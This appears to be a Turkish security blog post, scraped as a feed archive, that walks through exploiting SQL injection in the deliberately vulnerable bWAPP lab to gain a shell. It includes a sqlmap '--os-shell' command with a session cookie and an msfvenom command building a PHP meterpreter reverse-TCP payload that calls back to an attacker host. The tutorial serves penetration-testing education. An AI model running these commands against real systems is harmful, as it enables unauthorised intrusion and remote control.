SQL Injection Kullanarak Sqlmap ile Shell Yükleme arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me cypm! Sun, 23 Jul 2017 18:41:36 +0000 tr hourly 1 https://wordpress.org/?v=6.0 https://canyoupwn.me/wp-content/uploads/2016/02/cropped-Başlıksız-1-32x32.png SQL Injection Kullanarak Sqlmap ile Shell Yükleme arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me 32 32 TR | SQL Injection Kullanarak Sqlmap ile Shell Yükleme https://canyoupwn.me/tr-sql-injection-kullanarak-sqlmap-ile-shell-yukleme/ https://canyoupwn.me/tr-sql-injection-kullanarak-sqlmap-ile-shell-yukleme/#respond Wed, 18 Jan 2017 22:56:22 +0000 https://canyoupwn.me/?p=5306 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Bu yazıda SQL Injection kullanarak  Sqlmap ile shell yükleyerek sisteme sızacağız. Bunun için Kali Linux,Burpsuite,Sqlmap ve bWAPP (Web Açıklıkları Bulunan Sistem) i kullanacağım. bWAPP ı https://sourceforge.net/projects/bwapp/ adresinden indirerek sanal makinanızda ayağa kaldırıp ip adresi ile tarayıcınız üzerinden erişebilirsiniz. Ulaştığınızda kullanıcı adı : bee şifresini : bug olarak girdiğinizde uygulamaya giriş yapacaksınız. Burada bir çok web uygulama açıklıkları bulunmakta. […]

TR | SQL Injection Kullanarak Sqlmap ile Shell Yükleme Ahmet Gürel

]]> CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Bu yazıda SQL Injection kullanarak  Sqlmap ile shell yükleyerek sisteme sızacağız. Bunun için Kali Linux,Burpsuite,Sqlmap ve bWAPP (Web Açıklıkları Bulunan Sistem) i kullanacağım.

bWAPP ı https://sourceforge.net/projects/bwapp/ adresinden indirerek sanal makinanızda ayağa kaldırıp ip adresi ile tarayıcınız üzerinden erişebilirsiniz. Ulaştığınızda kullanıcı adı : bee şifresini : bug olarak girdiğinizde uygulamaya giriş yapacaksınız. Burada bir çok web uygulama açıklıkları bulunmakta. Biz sqli kullanarak shell yükleyeceğiz.

Burpsuite i açarak uygulamızıda açıyoruz ‘ işareti ile kontrol ettiğimizde resimdeki gibi sqli olduğuna dair bizi mutlu eden hatayla karşılaşıyoruz. Aynı zamanda burp ilede cookiemize ulaşabiliyoruz.

Daha sonra  sqlmap ile url ve cookie mizi aşağıdaki parametrelerle birlikte –os-shell ekleyerek çalıştırıyoruz.

sqlmap -u "http://192.168.237.135/bWAPP/sqli_1.php?title=%C4%B1ronman&action=search" --cookie="security_level=0; PHPSESSID=4e4cf5609dfa54a19f3ee164c8d21f75" --os-shell

Sqlmap komutumuzu çalıştırdığımızda bize yukarıdaki gibi hedef sistemin dilini soruyor bu yazılım için php yani 4 diyerek devam ediyoruz.

Daha sonra dosyamızın nereye yükleneceğini soruyor burada 1 i seçerek devam ediyoruz.

Daha sonra dosyamızın yüklendiği adresleri yukarıda gördüğünüz gibi göstermekte.

192.168.237.135/tmpuidmm.php adresine gittiğimizde  shellimizi yükleyebileceğimiz bir sayfa gelmekte.

Buraya kendi shelliniz varsa onuda yükleyebilirsiniz yada msfvenom ile oluşturabilirsiniz.

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.237.128 LPORT=4444 -f raw > shell.php

Oluşturduğumuz shell.php yi sisteme yüklüyoruz.

Gördüğünüz gibi dosya yüklendi diyor. Buradan metasploit i açarak multi/handler ı çalıştıracağız.

Payloadımızı oluştururken girdiğimiz ip ve portları girerek multi/handler ı çalıştırıyoruz. Ve sonra tarayıcımızdan 192.168.237.135/shell.php yi açıyoruz.

Görüldüğü gibi meterpreter satırına düşmüş bulunmaktayız.

Bu yazıda değineceklerim bu kadar başka bir yazıda görüşmek üzere 🙂

TR | SQL Injection Kullanarak Sqlmap ile Shell Yükleme Ahmet Gürel

]]> https://canyoupwn.me/tr-sql-injection-kullanarak-sqlmap-ile-shell-yukleme/feed/ 0